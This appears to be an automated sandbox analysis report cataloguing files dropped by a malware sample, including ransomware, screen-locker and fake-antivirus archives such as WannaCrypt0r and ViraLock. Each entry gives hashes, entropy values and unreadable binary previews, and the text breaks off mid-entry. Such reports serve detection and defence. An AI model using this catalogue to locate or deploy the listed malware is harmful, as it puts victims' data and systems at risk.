                                                                                                                                                    Preview:PK..3...c..aUM.....U..p.......Endermanch@RegistrySmart.exe......AE....!.J|..L.6..X. ."/,k.p.\9|....5~.....*0....:l....s].O.=w...S..[...).P4.....8....G..^.kFb..].]..u..5..<m./,v.3....e.U../k.i...0..4....&.......... ......`..tu..a......]K.0...A,.#sz!.cA....<>qq@9....P.X..........xX_...M...OE...y#MC;.!k@.r..Z}......c..ml...gd.-. n.`..v.Y.'..K.%:...?....*G..r...Tf..;....... eb.Y.J..........&V.E"A..[7.-....eo....P..7.h..gn..E...Sz......'ndO./.?..Z..o%u....y\..>.K...... @..0.^?e.jO.vdj..B..|.I.E.,TX.W....x.y........%.....E.....&..8..J.<.U.:..I.....o......{..3.V..Zx!.o._Jo.}..a..F8....k......3^.-....J.|A1....B........2...........js..8..|['.>....Sz.M...?.....@..Jl\<..@jme_..T..b..0....] .y.j.d....h.....Y....*.7.$,.............I.7+;..[V.....P.......z..93Ql`.ynC.G?..?..gd..HJ...4.ot.y ....U..PT@.0.7...g .q.@z...R.n.;..G.,t..V.....~.s1#.6Y=..8.......=.......3.#.m..q.Z$.3Dr<..i..$.k..z.t..=5...R}*...q8.l...0..).&.j.2IU.^d..zsX......@P.C...B..Y'...(.>..._.`..:..
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2265879
                                                                                                                                                    Entropy (8bit):7.999920263279079
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:aipCYzu1VcZeM5OyrAh6wXiBqOX0aawWqjPrQZRD9qgUBZZmpUVt:aae1eAh6aYjPrc9q9rZwU
                                                                                                                                                    MD5:5027CF25B38424D573321079BF190B0C
                                                                                                                                                    SHA1:A9E02136626B18D7785050A89DEE00A328BEF946
                                                                                                                                                    SHA-256:1CE3143DC4DAC71824B70DE90C3DB942C9DA15D450A4912871ADE10076CD1E8E
                                                                                                                                                    SHA-512:4B1E16E85CB0522346238B39124DDFF074280CED6AAF6E11937458F7309ED366DEB1267D8A24AE4D6B6A540325BE93DF31DE55F62E4892F1E5740B8A932FF32E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..3...c.f..C....Q."..v&.....Endermanch@SE2011.exe......AE.../4..Sr...(...D.>n.\....U.mJ..|?....#...Ya....5.)..#<.$.IQY..Un..*. C.v..!F.^..K...Vy*.i?"`.....>....U...#.b.Z.v.....%..6.....7..&..&.J.1.>l.1.s].K.......~.9.2.L....N.._._.^...3....e.:.V-..Qk..rZ]T..Z.#.!e...W.+_.E1.#.vT.\.O]{.&.4...k...(.#u..q.v8.:...wa.{.e......w.......h..q7<M...21vu..1..`./...c.....D.V..?j.E......lX0E0..OT..N...%.._.06UP.#..h!...Mn.....G.f.1............z.N..,%0.{m.Y..aC.....e.I.\.2...T$..c..!..)n..9.I.:N54.s..{.k.8...[......c......rd.Sg.e....P...o:......X.'C.........r.[..A../.....). .W.8)H...xK.;.@.6....$.8A.WM....7i.F8...f...nv,.,.d..XJ.x..'.<B.d..~D.......c..i...F@..h\...K...+..:.....yO......Y.q}.#..Y..YE.L..>a..u#..#G.(:...@.c.s..>...-....[.V..V.0.z...XT..a..b....C..us..D...R.........~.....G..!..p`8)/..1h^m.......q@.:..^.....!...Y.T.!.;..+..=.+......v.v...u....?.$.E..9...E.b.\Z.-.l%0...K.~..&C.j.1G...[.Rz.C.N...p...S....d.....8.w-.6/.......,w..g..
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904153
                                                                                                                                                    Entropy (8bit):7.999807302196412
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:+EH0fyd4HKpzkOSWV6Lgn+DRGEZGXDyg+6:DRd4qpIOSWVYg+DUNzL
                                                                                                                                                    MD5:32E630865A498A6FE5BF4D8DD593DCCD
                                                                                                                                                    SHA1:05217C896A53C77C7F751DE72875A7315232C293
                                                                                                                                                    SHA-256:62243C2840D5FBEEF1CCE73DBE4929727AFE174968B91FABA3848B89AB550D7F
                                                                                                                                                    SHA-512:BAA4BA5E61406848BCD2683FBD8D480C0AB22954AF9B9933284DFC4FB2E9361FE0244EFAE3CE9D171B5510B8030BB510FE788D8AE3FE476B29FC8CEA815AC244
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK........PD.E./%......"......Endermanch@SecurityCentral.exe..9....(....I.;x.xK...v..0.k=...;...eWw6....K.X.PV.^.&b...IL.1.....0O j*.I...n....y..b.,...x-...Q..8......(.p2..'.z..M.f(..R(.t.W) #.......}...5..K....Qg.....{..X.JD..y.D..).\....T.....H.d.I.Pz.M.\.h}.c....(Q0DD..l.&..5.a.._.Y....!..2$..]....I2../6....}.u.....A..q.H.t.u.....t.H...FS..a.>...g.|.z._,.IEtk..7$A...Sj.'.K.:.H....z.`..R.M4.O"..b. \...M....u..ljaESi).m.b)....g..RSS..\E..D.......4..L.1...g....1.%...J..s).........ST..IX.....c.0...=..8c.X....W.yn...n....[1......W2.L......B..._.d..Y.>........`......"....-.eD..:dM...p'._2*8.H...R..y?...G..^....4..eb....H%...>...A......8.....`..T.$..;.c.c..7.T..7.1...M:.7>....}..@..H....}V+.V,Z..=>.f@..-.&.M.....^Gy......q>..|6V<...Pe..o.w.3..H.GP......Q.*.....0..Ts.....&..)F...HT.,~....tLi...m...6.>....RB...mt.ma......01..kZ..6~..!...^./3.7g..3bV(..4......SU..?..$U..kV#L..bl....P.....,u.X.A.-.Y.Y....%|..e.r..>._X...edE....('. .,........ .~
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):470947
                                                                                                                                                    Entropy (8bit):7.999621239588262
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:12288:43DuMOagxhLiZEfyNX/rFLzXqBaW71tc99onYZ:vog/LiZdX/p3icXon2
                                                                                                                                                    MD5:1E23B530FEFBF0E4C6696CE8A0874081
                                                                                                                                                    SHA1:585AE1E314118BD4CBF15D2A66A6B708D2E46735
                                                                                                                                                    SHA-256:5DAF5731D28583A37A7D574D1D32CA89E2ED2DCC448CF0EBCDC6D43BC4981A92
                                                                                                                                                    SHA-512:2312469EB3FB93F311BF28C14D2F5AD39E3DDD3AD4AA19306F8B276D4F401972FDC5E7659F388C08DACD739A8162B05D06E052F4342EDF1C1DD9AECDC32560F0
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........0G.w......2.."...Endermanch@SecurityDefener2015.exe....H..[.R..U..rP.&........3.....95...Vv...$.Z.{...$..(#}...}Y%.....*.....5b../y...V..K.\K+..P..@.....[...kAg....Vtv6.....@..M.cI..'.f.HJ.x..v...@C.....z.. .].P.^..Fy.......&Q..h....0~..I..+jI../B..t..&|..M...F.....j..l..*....Y......Bo.......8.P.A...a.M.~):a. ..6....R..l`=.m.b.......V..qxo....y.I..bo`]..P..$.'...Gs.i..FE... .8n.F.F....I..'..(p.;F:..yM"n...PP.P....m...K...../.[R.....ctF.P.5j........f........6sSi.G..'.*Ba.iQ.4J.V..abt.9.}.:.....!....w7.c\..=..%!..dni(G!X0.....G0..)..Qu".....w....kpH..?...YA....l..0@*].W...u...L.....$...j..$..../..=S7...\.0.o....1_....1.......?V$....,.e..c.-.. ..."..5.G..s.duP.8\.r ....@^..X_S..r..>3.0...M.O......Q...4...p$.....m....qh...)Q)..s.....N..N.[z.Rh....A....~.=U.3?._g.W...yyG.EN.r.u.B...b: ...5...:.|..D...Q...."11.{4.gv.w\[o..6.$Q...[+S..gx..}.2..OJ.....:.a..zT.....0..).!z.Q....e..f=.F..M.V.[X.....#T...S.#..Ad(A.y.<(..........z..s...%|c..
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1423299
                                                                                                                                                    Entropy (8bit):7.9998682090292
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:Ca/D9aMH95/yTCjrz6oOzj0afgIN5j6sXTRzdi9IR7749FJsNk+:dL91Hb/lGVzN1Tfss3
                                                                                                                                                    MD5:F0C0F92E6D444F8D3C60A0B49F642462
                                                                                                                                                    SHA1:30B844E8D96B5B9866E01A6F74C8AC4EDAF75878
                                                                                                                                                    SHA-256:E74925BD172FD72370CA7CCC5C48294E83C56DBC7A9C2EF33C2AC22E19803758
                                                                                                                                                    SHA-512:697C5CAB839DC260CDA851D1D164555CC723449AB00B66EBB34EAA9A91C686424B5042A303CBE500208C34FD7C96C876D7E92506FA36A9CBFF0A9037DD1BFF6C
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK...........C..s|............Endermanch@SecurityDefender.exe.hc\.=.cG......K .-uHb..gkJwu9[....$6!I.X.Sg[.$j...Q&...O.Q}..........N9.J!.!..R..Yl#..4.....5..>.....$.=[.fJ"....T_..JB.5a:D......U......x..]30?.......&. ...1.$...P....F..A.$...$......!..z.P...J...g....X.....#.^j..1.....CW.l*"]"....E.}..............p.x.....4}....Lfo:;..n..H..n..y7.G..w.b........W.0.......|...Z..~.,A=.$.(/}.e.g...`..p]......Ry~KOL...u.....h@.{..Qm....6,..".Y.'..-...5)1...N.'...f.....'........1..<3.....x.Pw;q.@X.,..xR..^.......%..V............@..q(..=...{.[!..h.!~.X.....K....y..9.9.4.[$g..{.JC..a|.O+..h.!..%....*.1H.....}..#.............oceg..._. %...>..."..7d.<.vP...5..%.U..)...Nu.Zp.....|.KK...D.K.2.....N...u..d_..4..A...&..........dh;..j?.B..H.J...v.....L.t.....}....*W..s79..kd...3q...p..!}..d..M{m..Vn..N..0..r...)'.....t..5.dW......v.0...b.O..U`.d`...~...LXY.;..IM... ....r.{)r<xj4..x..T_..."g..(......6|.v..%....?..q.$?q..q.......'~5......P...%.6.A"s..Ed@.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2284722
                                                                                                                                                    Entropy (8bit):7.99992877602736
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:4NsjK2ZkFtT1ZuqgtHjs7Rl7ld4PLYqtng/9umtpQ42IC:4SjKl3u1tDs7S8kO9umt6uC
                                                                                                                                                    MD5:D49202312C94A40ACE73D0BC16C7D213
                                                                                                                                                    SHA1:82CC7B285F150E5A4F88B103BCD2D3B1E66CA6D9
                                                                                                                                                    SHA-256:6B172714B9C3DA500DA1C92971C9A1C4A5A8742FDF5DD62BD1A5587740FEFB22
                                                                                                                                                    SHA-512:FC451E431EFCDBEAACA725AF97079DF9E467ADEC3FDC4E3B75C9D80EE6810B6EC595C15F331DC339E7BF486656E5EF8E6A21478E48AB5038C7B04189A6A1F973
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........4>w.\..."...#.....Endermanch@SecurityScanner.exe .r.6..2..N.p.1..Pm. ....1w.......*..7..t].U.Vf....u..t.v...*.)xO.;...`..&.v..Dd.......i...8n.v...^...G...../.e..jV'5>.N.Y.....w.3..'...{...o./H...^..6..'C.....z..g.b.K..L.?4..e...P.3...#..u..h&z..:.3. x....#...n.u=E.l......K*\z..e.7cY..Q...8....i.,v..k.K.vL/......=.E..g...........}..u....RP.!...e........$..E...J.........+..)s._.Y.. ....k.*!o.s.b.G....Ao.TQ...t1.]..1:;.......R..P..{0S.=..%.h.. ..Lh...NHN...U......-..BR/.~]..........d."V..?.ET].&i+..I|..f...Q.(..7T]....f<.r.........x.11...@.......>.\P..m.)....D.......Hy..}4...R..oh....G.,....b.s..tB.....5P.A..E....:a....X.....z8.7...9O.\eT..p1.@O...l..r...1.yI...m>\V.'...*&.0......S3.o..U..N..J...wTI..%..).s..R...`.....M...RH=.=J.E....|..`..U.mN..|q.7..t.)b..7."V..g....6.E.....+....P....3.P.0.|.....=>..q.C...l.2..K...../+.......=]..L.........^.|.f...SS.=.k>..z..,l.$'.D...0I.s&iJ..,.WD".....}.bK]u..4.q..(..e.C^.hA!{....F/...+.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):385789
                                                                                                                                                    Entropy (8bit):7.999536313248271
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:MdZTQDqwhWbeXTbAf4KINkYLcwpO/ZuY2EwbJ2Fgzz+n6tBN+Pz9BQBa4oQRMgs:yZw1DbAf4KIqM4cewFQ2z+6XNk3QVRM5
                                                                                                                                                    MD5:541D8406002AA2750A2CF59480E71D94
                                                                                                                                                    SHA1:AC40C4715CCA6967E2AF789CEE246B5A0D533A9F
                                                                                                                                                    SHA-256:DDF1B79F563D94BB3DDB46B37AA010D95403DC7A1DEBFC9476A8AB449472B738
                                                                                                                                                    SHA-512:9D3F5FD405BE3A76B9D0150E58A2AF24CD609A1B7B63BAC9E68350A0B153A42BF4941C5D2D8D752EE5D9D6DCC690250811A9C688E2EFCC458ABEF71580ADD73B
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..3...c.).#M....!....... ...Endermanch@SmartDefragmenter.exe......AE.....@.97@..g\7.B..y.u^RG)...\M..x^VB...l`..h...W.P8.B.:..(O....V.)6.%...:..X.,...'<.....rB.....GQ%.p|.p"K..h.x..t..Q...".n...U...S.t...?.6......]Z..z....#a.(.v]A._R./...kJW....i.:.q_H.s{S..LA.X.O...~...C.."..r.o..B.4........k.X........B.j.....J.Da...."..,6.....g_../%F.N$Wj...U...J.nRr......].....EN...V@{(......C.p.Z.|N(J)T..\.......fv.6.F~.b.........)........@[..0.F.f...G5..3L1......:..u.G..AjF...8.er..jX+J.i......'hA..>#^..*6...-/.XG...\.rs.5....FO..P....<.ePA..&...T%....S..l.wT6.....s.]K2pKnr.~+.....Lc.....>.d7R...#.. .Oz....9....).2k-.R`...^...|.....|dXS....rd..N].m8..#..|..y+...?...E... .......f...RG..F/F.K4....J.a.#2.Pc..S..d..?......Q...0..#.h...R.N...AJo._9.r.~....r.V...5..Fx.....A..y.R..m. .D.^..Q...-...L....v...%.E.....9.r,.:.C..l.9..LF.....;....*i.a..o...*...v.._......r.=z......={h.*Y.8..i.....;bK2....ORr.p........n.....]b.C`....".&..qD.y..t.5....}.kG...;....u=.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):784070
                                                                                                                                                    Entropy (8bit):7.999747224972193
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:12288:qfdxMBL8UIO+V+uEVAr7O79u5WjsPtBaZf/SzSVbYnOv/tnNriQ7QkmgVYDlbg1b:qfU5IO+kWr7O7QwsVAZyz6Yn2t5JsZgD
                                                                                                                                                    MD5:B698AEFA1322550E130867CBD69CE67B
                                                                                                                                                    SHA1:74C12404ED33CFD13B58606757F9FF0E06650C41
                                                                                                                                                    SHA-256:A2247754D4305D00900DA86B8957562696F80AE025C8D8EAC27F38E4023E7F89
                                                                                                                                                    SHA-512:B1242E7CD5506955D6D999213F98F16321CB866F7FC6A14ED9D11E1A8735C9B4632E9E8CB83073797B5ACE91B963D57BBBB63EF8D3640C1048C962778834B5BB
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..3...c.s..:........s.......Endermanch@VAV2008.exe......AE...,.jM......`.n...[.7........33.Y.-....?x.so.X_.!s#7lN..*.Z..5...6I.y.vO.q>.1....>.J...g..g..[...o....br.&..#...'k.U..b..V~W.2...!..x,....!..8..5,....g.w[.).>..5..-]3+......8C........S..(gn&2......M.w@a..y0.~#.1r...li42.d.Ahoq>.OcB82<..JRN....)...X.8]..V.....8...,..<...J.}...............:..1...h^.*.nBn.f..*....zA.(...).2.K.l.Jv.%ZD....Mx7b .~....A....".....q;.]A.....X...?...7.:D.....$..........g.tw..`2.7.T...(.v.8.._^......X...m{.=.M.._6..B".....)D.H.....awI.h..o....0+..YO._.i.4...C&.....%..q,...Z.>.^_7.6tC.<.....P{.[.4...3Xo........d...Q.>,4...o....Z....,.._Jk.....Q.V.....>...D.Yb.]{h-s~<.bK.NIl.y.`.I^W.'.9.l..e...k.U(.E.D.......P..^.<Q...U.KBA....~...d..x.6b......l.g.s...A..DVQ.8.....Zi.F.#...8..*[).@....K...H0.......k..T%.`f#e.N}!{ o.0..<=4.....~9q....V.G.6...c46...L....".....).sx`..........F...6.%N.b.....)...f.\.*HY.k..[..a...J.D.-.ev....vPc)t"....b....+..Z.A_V...H..=r.v..G..|.4..p
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):135339
                                                                                                                                                    Entropy (8bit):7.998464822213335
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:EVGcVUZ2RO+vvmYYN4ul1c0wTLcc0JuEzXiXoNn59cz+P+gJmq:EFVOYM4IwUc0JpzXYorWyL
                                                                                                                                                    MD5:6A47990541C573D44444F9AD5AA61774
                                                                                                                                                    SHA1:F230FFF199A57A07A972E2EE7169BC074D9E0CD5
                                                                                                                                                    SHA-256:B161C762C5894D820CC10D9027F2404A6FEC3BC9F8FD84D23FF1DAEF98493115
                                                                                                                                                    SHA-512:FE8A4FD268106817EFC0222C94CB26AD4AE0A39F99AACAA86880B8A2CAA83767FFE8A3DD5B0CDCC38B61F1B4D0196064856BD0191B9C2D7A8D8297C864A7716D
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..3...c..7yE................Endermanch@ViraLock.exe......AE....d...EJK.k....+.$?.X;....g.........>.jO..y.p:.d....~.......Y.y.....Q.....iy...\...}.....V.sL..@t...<....au.l=i.q..w..*..`..h.a.........3\.0.ox.i...C..f.=.E.....>..A....2.X.#.qml>...5.YLj]!Id.#...A .1n{8.D?.P5..<.G[.R...P.j..m<$...O.\v...%...R..s.M......:.;......*....!:.:-.5.p.....d%..C....^n.....,.l.qWN..T...rW.~zlz...<H....?.....m.so.e..*.k........?..bI....c.R...j...3...g.D.O.&B.".?)Z..=.y...J.^s.Z.....f.n...J..d7..&]...&..N.}e1......2w.w.:..C9W..B.T_..%.4....y.qa...Q'ry.f...;KY;e..VN...PE|..d....T....d..{........(..r..b1.R....J^...E.H|.B.q(..`.3.....Ge.........D...........R...>....?.#..B..s...Z=..y.E.Ux.m."p.i...p....Y...2..C..3].q.7...i7.C.Y.Eo...z..]... ......)H.;..D......+6.Q.d.o.d.=..e.O..[+...,..siV.1f.........[.....XTh....(.......fmf...m.......T..?....r...O..'#u.=.....Z....|d^..<....n.!.=dwos.|....e......ul.0.z....Bp..7|(~.Q...Z.>.._.V..W....t....2%.....7..+.....B....
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3477754
                                                                                                                                                    Entropy (8bit):7.999945362964861
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:0x8KJHkctwJdVlgBq+q1vqtWdhQIajy4AsOLgVv+L3QXz+B7m1qyapDgJmeiTLW:0x8KJX+dVHvtzaj3xWgw79icXW
                                                                                                                                                    MD5:E58FDD8B0CE47BCB8FFD89F4499D186D
                                                                                                                                                    SHA1:B7E2334AC6E1AD75E3744661BB590A2D1DA98B03
                                                                                                                                                    SHA-256:283F40E9D550833BEC101A24FD6FD6FBD9937ED32A51392E818FFFF662A1D30A
                                                                                                                                                    SHA-512:95B6567B373EFA6AEC6A9BFD7AF70DED86F8C72D3E8BA75F756024817815B830F54D18143B0BE6DE335DD0CA0AFE722F88A4684663BE5A84946BD30343D43A8C
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK...........J.."@>.5...5.....Endermanch@WannaCrypt0r.exeo..h.....7...8..].}..!..'...4...dl..W......n.g.1x.;..:..$W...)@..]t ...s.I..J...B.:.|.fcJ...HtS..}.X..Pe..0.....f5U.../..^@x.O...i.....c....:no..."m.O.$........<..H..f$...0..G..V.D..y..Wn....2.F......O-..j..&...'V. ...6..p......S.....b<1d.H.W._.d'..4v<M{...0|...CS.Tf...L....+.@kI.PV...ZM.tp..L.....I......!..!.@n..gcSDm,.......{M..-.a._..6`~..:<...DT...f..d.(..."..xOsr.1W..3.*.........lJ...!...=....N..8...zU..J{.n......(:.-V.(.&.n..M.#dkT.....T..O.>.3j.0...U...:). ..`.."1...yQZ..tt....B.....)3e}6.2.b.....q..D...g...?..!...1...6.....U...k..M.J......R..zf..c...&.e2>........L........(P=.......Vp.T..2..&9.U..+..WPT.....u.......0...!DmA..&S....n..d..I.Jz#!..7....vn7.?...~.H...Wy. .7K....#$..q...E{.B.An..>...\..#3bq.H...>;j........].....3_zk..k.......a"S^B.f...D0....<J...4#..MZs......E..._>.L8Kr.0..z.....F...Z..~..!.U.g{X.....i&1....EV.P...C...F((.....)C...I.5oW.....2.c....&...>C0..
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1654828
                                                                                                                                                    Entropy (8bit):7.999880621363435
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:2OiR+zJsyziTwWQRtQWgpn8QbX1ncWFwUGVF6VpHk:2OVdzVW4tQWgp8QT1XFwUGKPk
                                                                                                                                                    MD5:713F3673049A096EA23787A9BCB63329
                                                                                                                                                    SHA1:B6DAD889F46DC19AE8A444B93B0A14248404C11D
                                                                                                                                                    SHA-256:A62C54FEFDE2762426208C6E6C7F01EF2066FC837F94F5F36D11A36B3ECDDD5F
                                                                                                                                                    SHA-512:810BDF865A25BDE85096E95C697BA7C1B79130B5E589C84AB93B21055B7341B5446D4E15905F7AA4CC242127D9ED1CF6F078B43FE452AD2E40695E5AB2BF8A18
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..........HpF..`?...R&.#...Endermanch@WinlockerVB6Blacksod.exe....E9u.....!j%..R.l.M7.I......m...............x'...o..2...`.FU}.,..s.DI..|j,.zXxA...B..uG.y....v.d.jx....p.X..c.i.l/!..1..T.._.z0..o......#.A..dA".;'E...Q..F.J....5.X!.~l......<K&..1..oC.'..Y.\....gX..3...CJ.?./0..7[.|d..._...y..X#..a.;......-..2..|..G.%W...\m..Y.&w/....."\......@.R..m<tgZV*...y..9+ ....R.V....7.8t....7..........O PZcW.....e.....7..}.K...4.*.w.DK0...KbV.H..W<......g7.".js.H...f..\...2./KX..@.p........\.F"..S.r.-,.b._E.{...=...w..2;w.&.S..K.Fg[.d#v..R..<L.k.@..<2.t<.5}e...v...rP......6.?T....g..................#.........v......O.l;. ....=.{.m.......C..._..[$A1P.9....h.d.K.m._...:j.....:.kJ..."wz........6.+..yi......e....,5..%....J..k..I...;...s.?..\H..7=.$..VbU.#^........VIS>..Kw=W.YO..;.k.[$3..lM...G4U.9..)=....-.....'.Y......R....=.b.R..j.....?..y.,.......<GT"..Y.Z.....b...s.f.*...I.....[.D..J=...l.p.s3]g,....vD..8.]...QW..^..X.y9..:...I..........xA.oj.....
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):77102
                                                                                                                                                    Entropy (8bit):7.997393453617121
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:1536:0Nm7bj9DAfxcbnnOOPjaW7S3ayJpOGtz57MC4Wlzy1vG1NyY/:qAbj9EerOOPjV23ayeGpM+18c
                                                                                                                                                    MD5:213743564D240175E53F5C1FEB800820
                                                                                                                                                    SHA1:5A64C9771D2E0A8FAF569F1D0FB1A43D289E157C
                                                                                                                                                    SHA-256:65F5D46ED07C5B5D44F1B96088226E1473F4A6341F7510495FE108FEF2A74575
                                                                                                                                                    SHA-512:8E6B1822B93DF21DD87BF850CF97E1906A4416A20FC91039DD41FD96D97E3E61CEFCD98EEEF325ADBD722D375C257A68F13C4FBCC511057922A37C688CB39D75
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK........;.=>.#.}.,...P......Endermanch@Xyeta.exe.V.t*J...:K.J.....(.T.........zv.....+jQ..s.l..'OZ..5.a.c}..>..+.M.\....C,c...E.L6@ml.D./.&W..f^...`........T.%.u....X......%..F..i...'.F.....R-.8.9f:......d...Gd.B../...&g.c.T..P#.].>w..&S\.i.b.....s..|.....P............[.}..y...h.5]v..a....I..H.?.......B.Z./<.%.S..v...q....#.g,{E.a..&k....]...[8..%.x U#..-.-&R..M._|e.+.1.L.+.%.U!..iK....y6.r%..NR9......F... ..J~..n.]....'.J$+._l'.F..........L....-b.....'...8......0.Q...._...i..=%...M..?.)`t...2..Te....7\'. ..m....~}....d...:%...7FV&..Y..=.xG...*.)9q,....}..u.H.@]7f..T[.....{.....$E.f..x.s.N'(XI..j.X.b\..J..,..I.<.>....!.nW...4..7R{ ..?......PG6.yh....f`..".J B.l...'6.&q_..Fhr@.:..kkbiF...2/q..^.@.DH...s.^..7@...&.....\3.;:.%' .?.......D....C?....A....X.p..i.7.YY:L.JE.{..CYfp...n..<.wXa%}..........X.#I....:.eu.....:......FMUk.l.O'...'....].*^.95..i.F..sB..A.ZG.]/...+.....3.r6.8*l.....G8A4}.C..1.~....`....|..~....nL>(@..p..~..z.....}Fck..W.....J
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Sep 29 20:59:40 2022, mtime=Thu Sep 29 20:59:40 2022, atime=Fri May 28 08:03:30 2010, length=9421312, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1129
                                                                                                                                                    Entropy (8bit):4.683220173989088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8m/400X2lmKX0dp8DCDiXM4llqImWkzjAArre2LbdpY+u1kcEMbdpY+uDFNUUdkH:8mQ/0kdOEiwAAfndH4deUU0gAs7aB6m
                                                                                                                                                    MD5:2ABA44E9D60E6CEF22D209581DE586E2
                                                                                                                                                    SHA1:02E6B21849777C134EE3D144D87993FDC48D3FEF
                                                                                                                                                    SHA-256:D6DCDF4C9A8EFEED2674CF5A637947F778213EE8495B9E09B4B614355BEB31B0
                                                                                                                                                    SHA-512:BC8B2B3A025041BB31C6A2ABB904146521BACF73B76483A383609828F2C73B68B7FB496AB6FBB9A617AA9E210B772EBCF760E05AFA3E7351090EF16663E78AC2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:L..................F.... ...0.;.N....a.N.....D...............................P.O. .:i.....+00.../C:\.....................1.....=Uu...PROGRA~2.........L.=Uu.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....h.1.....=Uu...ANTIVI~1..P......=Uu.=Uu...............................a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.....f.2.....<pH .avpc2009.exe..J......=Uu.=Uu...........................H...a.v.p.c.2.0.0.9...e.x.e.......b...............-.......a.............'k.....C:\Program Files (x86)\antiviruspc2009\avpc2009.exe..9.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.\.a.v.p.c.2.0.0.9...e.x.e.&.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.a.n.t.i.v.i.r.u.s.p.c.2.0.0.9.........*................@Z|...K.J.........`.......X.......051829...........!a..%.H.VZAj...-.............-..!a..%.H.VZAj...-.............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.829165307494805
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:4QbNIeVglStud3V/8HhypIraC3nNt9UV3DAigiz8kzlzSOWlT+n:4QbeSgl18Hh7Nt6U+8kJzYlCn
                                                                                                                                                    MD5:673AF4119C75AE53DF44BB6D64E07845
